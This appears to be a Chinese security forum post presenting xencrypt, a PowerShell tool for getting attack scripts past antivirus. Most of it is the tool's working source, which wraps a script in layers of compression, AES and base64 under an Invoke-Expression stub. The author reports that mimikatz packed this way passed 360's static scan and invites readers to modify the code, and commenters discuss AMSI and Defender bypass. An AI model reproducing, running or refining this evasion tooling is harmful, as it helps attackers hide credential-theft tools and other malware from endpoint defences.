xencrypt工具原理分析及使用
我们在攻击过程中,经常会遇到被杀软拦截的情况,绕过的方式也各不相同:有基于黑白名单的,有基于shellloader的,也有基于加密与混淆的。今天介绍的 xencrypt 是一款用 PowerShell 编写的工具,原理是对脚本做多层"压缩 + AES 加密 + 变量名随机化",再生成一段解密后 Invoke-Expression 执行的存根。需要先说明一点:它把 AES 密钥和 IV 与密文一起写进了同一个输出文件,所以这里的"加密"本质上只是混淆,不提供任何保密性,拿到文件的人可以机械地一层层还原。大家也知道现在加密和混淆被杀软检测得很严,这类手法的生存空间越来越小;介绍这个工具主要是因为以前用过,效果还可以,而且整体不复杂,可以按自己的需求修改来用。
工具的整体流程为
源码也简洁明了,算上注释才 200 行,不算注释在 150 行左右。下面贴的是主函数的核心部分:参数定义($infile、$outfile、$iterations)和 Create-Var 辅助函数(其返回值被用作存根里的变量名)没有列出,完整代码见文末的项目地址:
1.读取文件
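# --- Core of the Invoke-Xencrypt wrapper (listing starts mid-function) ---
# $infile, $outfile, $iterations and the Create-Var helper are defined
# outside this listing. Each iteration wraps the current script text in one
# more compress -> AES -> base64 layer and replaces it with a PowerShell stub
# that reverses that layer and hands the result to Invoke-Expression.
#
# NOTE(review): the AES key and the IV are written into the same output file
# as the ciphertext (see the -f call at the end of the loop), so these layers
# are obfuscation only, not confidentiality; anyone holding the file can
# unwrap every layer mechanically.
# NOTE(review): the innermost plaintext is still passed to Invoke-Expression
# at run time, so a host-side script scanner that hooks script execution
# (AMSI, where present) presumably sees it at that point; the layers only
# hide the script at rest.

# read
Write-Output "[*] Reading '$($infile)' ..."
$codebytes = [System.IO.File]::ReadAllBytes($infile)

# With fewer than one iteration the loop below never assigns $code and the
# original wrote an empty output file; fail loudly instead.
if ($iterations -lt 1) {
    throw "-Iterations must be at least 1"
}

for ($i = 1; $i -le $iterations; $i++) {
    # Decide on encryption params ahead of time so the generator and the
    # emitted stub agree on every setting.
    Write-Output "[*] Starting code layer ..."
    $paddingmodes = 'PKCS7','ISO10126','ANSIX923','Zeros'
    $paddingmode = $paddingmodes | Get-Random
    $ciphermodes = 'ECB','CBC'
    $ciphermode = $ciphermodes | Get-Random
    $keysizes = 128,192,256
    $keysize = $keysizes | Get-Random
    $compressiontypes = 'Gzip','Deflate'
    $compressiontype = $compressiontypes | Get-Random

    # compress (once; the original listing repeated this whole block verbatim
    # and simply discarded the first result)
    Write-Output "[*] Compressing ..."
    [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
    if ($compressiontype -eq "Gzip") {
        $compressionStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
    } elseif ( $compressiontype -eq "Deflate") {
        $compressionStream = New-Object System.IO.Compression.DeflateStream $output, ([IO.Compression.CompressionMode]::Compress)
    }
    $compressionStream.Write( $codebytes, 0, $codebytes.Length )
    # Closing the compressor flushes the final block; ToArray() still works on
    # the closed MemoryStream.
    $compressionStream.Close()
    $output.Close()
    $compressedBytes = $output.ToArray()

    # generate key
    Write-Output "[*] Generating encryption key ..."
    $aesManaged = New-Object "System.Security.Cryptography.AesManaged"
    if ($ciphermode -eq 'CBC') {
        $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
    } elseif ($ciphermode -eq 'ECB') {
        $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::ECB
    }
    if ($paddingmode -eq 'PKCS7') {
        $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    } elseif ($paddingmode -eq 'ISO10126') {
        $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::ISO10126
    } elseif ($paddingmode -eq 'ANSIX923') {
        $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::ANSIX923
    } elseif ($paddingmode -eq 'Zeros') {
        $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
    }
    $aesManaged.BlockSize = 128
    # Honour the randomly chosen key size. The original hard-coded 256 here
    # while the emitted stub declared "KeySize = $keysize", so the stub's
    # declared size could disagree with the real key length; it presumably
    # only kept working because the stub assigns .Key right after .KeySize.
    $aesManaged.KeySize = $keysize
    $aesManaged.GenerateKey()
    $b64key = [System.Convert]::ToBase64String($aesManaged.Key)

    Write-Output "[*] Encrypting ..."
    $encryptor = $aesManaged.CreateEncryptor()
    $encryptedData = $encryptor.TransformFinalBlock($compressedBytes, 0, $compressedBytes.Length);
    # Blob layout handed to the stub: 16-byte IV, then ciphertext. The IV is
    # emitted for ECB too, so the stub can always split at offset 16.
    [byte[]] $fullData = $aesManaged.IV + $encryptedData
    $aesManaged.Dispose()
    $b64encrypted = [System.Convert]::ToBase64String($fullData)

    Write-Output "[*] Finalizing code layer ..."
    # Build the decryption stub as a -f format template. {0} and {1} are the
    # base64 blob and key; {2}..{9} become variable names supplied by
    # Create-Var. Single quotes keep '${2}' literal until -f fills it in.
    # Statements that do not depend on each other are shuffled within their
    # group so successive runs differ in statement order as well as names.
    $stub_template = ''
    $code_alternatives = @()
    $code_alternatives += '${2} = [System.Convert]::FromBase64String("{0}")' + "`r`n"
    $code_alternatives += '${3} = [System.Convert]::FromBase64String("{1}")' + "`r`n"
    $code_alternatives += '${4} = New-Object "System.Security.Cryptography.AesManaged"' + "`r`n"
    $code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
    $stub_template += $code_alternatives_shuffled -join ''

    $code_alternatives = @()
    $code_alternatives += '${4}.Mode = [System.Security.Cryptography.CipherMode]::'+$ciphermode + "`r`n"
    $code_alternatives += '${4}.Padding = [System.Security.Cryptography.PaddingMode]::'+$paddingmode + "`r`n"
    $code_alternatives += '${4}.BlockSize = 128' + "`r`n"
    # KeySize and Key stay in one alternative so KeySize is always set first.
    $code_alternatives += '${4}.KeySize = '+$keysize + "`n" + '${4}.Key = ${3}' + "`r`n"
    $code_alternatives += '${4}.IV = ${2}[0..15]' + "`r`n"
    $code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
    $stub_template += $code_alternatives_shuffled -join ''

    $code_alternatives = @()
    $code_alternatives += '${6} = New-Object System.IO.MemoryStream(,${4}.CreateDecryptor().TransformFinalBlock(${2},16,${2}.Length-16))' + "`r`n"
    $code_alternatives += '${7} = New-Object System.IO.MemoryStream' + "`r`n"
    $code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
    $stub_template += $code_alternatives_shuffled -join ''

    # The decompressor must match the compressor chosen above.
    if ($compressiontype -eq "Gzip") {
        $stub_template += '${5} = New-Object System.IO.Compression.GzipStream ${6}, ([IO.Compression.CompressionMode]::Decompress)' + "`r`n"
    } elseif ( $compressiontype -eq "Deflate") {
        $stub_template += '${5} = New-Object System.IO.Compression.DeflateStream ${6}, ([IO.Compression.CompressionMode]::Decompress)' + "`r`n"
    }
    $stub_template += '${5}.CopyTo(${7})' + "`r`n"

    $code_alternatives = @()
    $code_alternatives += '${5}.Close()' + "`r`n"
    $code_alternatives += '${4}.Dispose()' + "`r`n"
    $code_alternatives += '${6}.Close()' + "`r`n"
    $code_alternatives += '${8} = [System.Text.Encoding]::UTF8.GetString(${7}.ToArray())' + "`r`n"
    $code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
    $stub_template += $code_alternatives_shuffled -join ''

    # The recovered plaintext is executed via Invoke-Expression (or its alias).
    $stub_template += ('Invoke-Expression','IEX' | Get-Random)+'(${8})' + "`r`n"

    # it's ugly, but it beats concatenating each value manually.
    $code = $stub_template -f $b64encrypted, $b64key, (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var)
    # The stub becomes the input of the next layer.
    $codebytes = [System.Text.Encoding]::UTF8.GetBytes($code)
}

Write-Output "[*] Writing '$($outfile)' ..."
[System.IO.File]::WriteAllText($outfile,$code)
Write-Output "[+] Done!"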
使用 mimikatz 测试一下效果,未经工具处理的检测结果:
使用默认参数的效果
经过5次工具处理的结果
觉得效果还可以,毕竟国内常用的 360 这类杀软当时还是过了的(注意这只是静态扫描的结果,运行时脚本最终仍要经过 Invoke-Expression 执行)。项目地址:https://github.com/the-xentropy/xencrypt ,有更高需求的可以自己再改改源码。
自评TCV=1
搞powershell应该先搞amsi吧
powershell确实挺困难的
意义不大,defender都过不了。另外有amsi的存在,混淆powershell也没啥用
@895515845 确实是 感谢 他是加密上升级成了AES和XOR 和我评论里说的那样,如果自己想升级,可以升级一下key生成和加密这部分
BetterXencrypt是这个的升级版
自己修改的话,key生成和加密这个地方可以改一下